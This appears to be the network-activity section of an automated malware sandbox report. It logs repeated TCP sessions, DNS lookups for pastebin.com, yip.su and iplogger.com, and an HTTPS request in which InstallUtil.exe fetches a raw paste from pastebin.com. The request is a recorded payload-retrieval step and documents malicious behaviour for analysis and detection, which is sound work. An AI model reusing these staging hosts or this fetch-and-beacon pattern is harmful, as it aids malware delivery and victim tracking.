                            Sep 10, 2024 18:21:46.031527042 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.031542063 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.507222891 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.508868933 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.508888006 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665107965 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665160894 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665194988 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665218115 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665250063 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.665278912 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665296078 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.665299892 CEST44349729104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:46.665344000 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.670063972 CEST49729443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:46.787560940 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:46.787612915 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:46.787681103 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:46.787930965 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:46.787944078 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.272569895 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.274125099 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.274144888 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.494560957 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.494606972 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.494642019 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.494648933 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.494663000 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.494693041 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.494699001 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495223045 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495250940 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495265961 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.495274067 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495307922 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.495313883 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495326996 CEST44349730188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:47.495359898 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:47.495599031 CEST49730443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:51.906022072 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:51.906100988 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:51.906213999 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:51.906497002 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:51.906533957 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.383263111 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.385077953 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:52.385164022 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508644104 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508688927 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508716106 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508749008 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508800030 CEST44349731104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:52.508852959 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:52.508882046 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:52.509504080 CEST49731443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:52.536259890 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:52.536317110 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:52.536559105 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:52.536843061 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:52.536858082 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.001904964 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.003463030 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:53.003492117 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226181984 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226227045 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226264000 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226291895 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226310015 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:53.226322889 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226334095 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226377964 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:53.226377964 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:53.226686954 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.226793051 CEST44349732188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:53.227919102 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:53.228203058 CEST49732443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:57.655752897 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:57.655802011 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:57.655870914 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:57.656193972 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:57.656208038 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.349838972 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.353530884 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:58.353566885 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547355890 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547382116 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547414064 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547468901 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547538042 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:58.547557116 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547575951 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:58.547590017 CEST44349733104.20.3.235192.168.2.11
                            Sep 10, 2024 18:21:58.547640085 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:58.548053980 CEST49733443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:21:58.570266962 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:58.570319891 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:58.570610046 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:58.570724010 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:58.570735931 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.029046059 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.030742884 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.030764103 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267100096 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267148972 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267179966 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267184973 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.267246962 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267297983 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.267309904 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267339945 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267368078 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267416000 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.267424107 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267494917 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.267501116 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267513037 CEST44349734188.114.97.3192.168.2.11
                            Sep 10, 2024 18:21:59.267584085 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:21:59.267975092 CEST49734443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:03.687416077 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:03.687463045 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:03.687536955 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:03.687868118 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:03.687880039 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.151442051 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.153757095 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:04.153793097 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.268919945 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.268970013 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.269006014 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.269040108 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.269049883 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:04.269074917 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.269095898 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:04.269148111 CEST44349735104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:04.271867037 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:04.272243977 CEST49735443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:04.293560982 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.293612003 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.293739080 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.294008970 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.294023037 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.778997898 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.781770945 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.781795979 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926103115 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926156044 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926201105 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926214933 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.926240921 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926274061 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926275015 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.926284075 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926323891 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926328897 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.926337957 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926382065 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.926386118 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926419973 CEST44349736188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:04.926454067 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:04.926899910 CEST49736443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:09.406039000 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:09.406075001 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:09.406157017 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:09.406377077 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:09.406388044 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:09.890500069 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:09.892380953 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:09.892414093 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039738894 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039782047 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039805889 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039829016 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:10.039832115 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039839983 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.039877892 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:10.039963961 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.040002108 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:10.040014029 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.040029049 CEST44349737104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:10.040067911 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:10.040575981 CEST49737443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:10.060981989 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.061032057 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.061126947 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.061502934 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.061522007 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.532507896 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.534143925 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.534172058 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.771991014 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772063971 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772099018 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772109032 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.772142887 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772186041 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.772187948 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772201061 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772255898 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772255898 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.772264957 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772310019 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.772319078 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772356987 CEST44349738188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:10.772399902 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:10.772826910 CEST49738443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:15.171495914 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.171535015 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.171644926 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.171864033 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.171875954 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.649744034 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.651283979 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.651315928 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.807862997 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.807946920 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.807980061 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.808017969 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.808044910 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.808115005 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.808152914 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.808193922 CEST44349739104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:15.808248043 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.808598995 CEST49739443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:15.834161043 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:15.834206104 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:15.834301949 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:15.834630966 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:15.834644079 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.312047958 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.313647032 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.313663960 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.539865017 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.539917946 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.539947987 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.539985895 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.539983988 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.540019989 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540098906 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.540121078 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540153027 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540164948 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.540179014 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540224075 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.540236950 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540258884 CEST44349740188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:16.540303946 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:16.540640116 CEST49740443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:20.952930927 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:20.952970028 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:20.953183889 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:20.953368902 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:20.953378916 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.412739992 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.416457891 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:21.416474104 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.538897038 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.539033890 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.539118052 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.539167881 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:21.539181948 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.539413929 CEST44349741104.20.3.235192.168.2.11
                            Sep 10, 2024 18:22:21.539496899 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:21.539899111 CEST49741443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:22:21.557220936 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:21.557276964 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:21.557363987 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:21.557595968 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:21.557620049 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.029640913 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.032217026 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.032232046 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246392012 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246443987 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246474981 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246494055 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.246506929 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246520042 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246550083 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.246565104 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246597052 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246604919 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.246611118 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246654987 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.246660948 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246680021 CEST44349742188.114.97.3192.168.2.11
                            Sep 10, 2024 18:22:22.246726990 CEST49742443192.168.2.11188.114.97.3
                            Sep 10, 2024 18:22:22.247016907 CEST49742443192.168.2.11188.114.97.3

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 10, 2024 18:20:58.796513081 CEST4958953192.168.2.111.1.1.1
                            Sep 10, 2024 18:20:58.805022955 CEST53495891.1.1.1192.168.2.11
                            Sep 10, 2024 18:20:59.713452101 CEST5956253192.168.2.111.1.1.1
                            Sep 10, 2024 18:20:59.809323072 CEST53595621.1.1.1192.168.2.11
                            Sep 10, 2024 18:21:10.532569885 CEST6401953192.168.2.111.1.1.1
                            Sep 10, 2024 18:21:10.540421963 CEST53640191.1.1.1192.168.2.11

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 10, 2024 18:20:58.796513081 CEST192.168.2.111.1.1.10x7270Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                            Sep 10, 2024 18:20:59.713452101 CEST192.168.2.111.1.1.10xf34aStandard query (0)yip.suA (IP address)IN (0x0001)false
                            Sep 10, 2024 18:21:10.532569885 CEST192.168.2.111.1.1.10xcefaStandard query (0)iplogger.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 10, 2024 18:20:58.805022955 CEST1.1.1.1192.168.2.110x7270No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:20:58.805022955 CEST1.1.1.1192.168.2.110x7270No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:20:58.805022955 CEST1.1.1.1192.168.2.110x7270No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:20:59.809323072 CEST1.1.1.1192.168.2.110xf34aNo error (0)yip.su188.114.97.3A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:20:59.809323072 CEST1.1.1.1192.168.2.110xf34aNo error (0)yip.su188.114.96.3A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:21:10.540421963 CEST1.1.1.1192.168.2.110xcefaNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                            Sep 10, 2024 18:21:10.540421963 CEST1.1.1.1192.168.2.110xcefaNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • pastebin.com
                            • yip.su
                            • iplogger.com

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.1149711104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:20:59 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:20:59 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:20:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10bf9f794141bd-EWR
                            2024-09-10 16:20:59 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
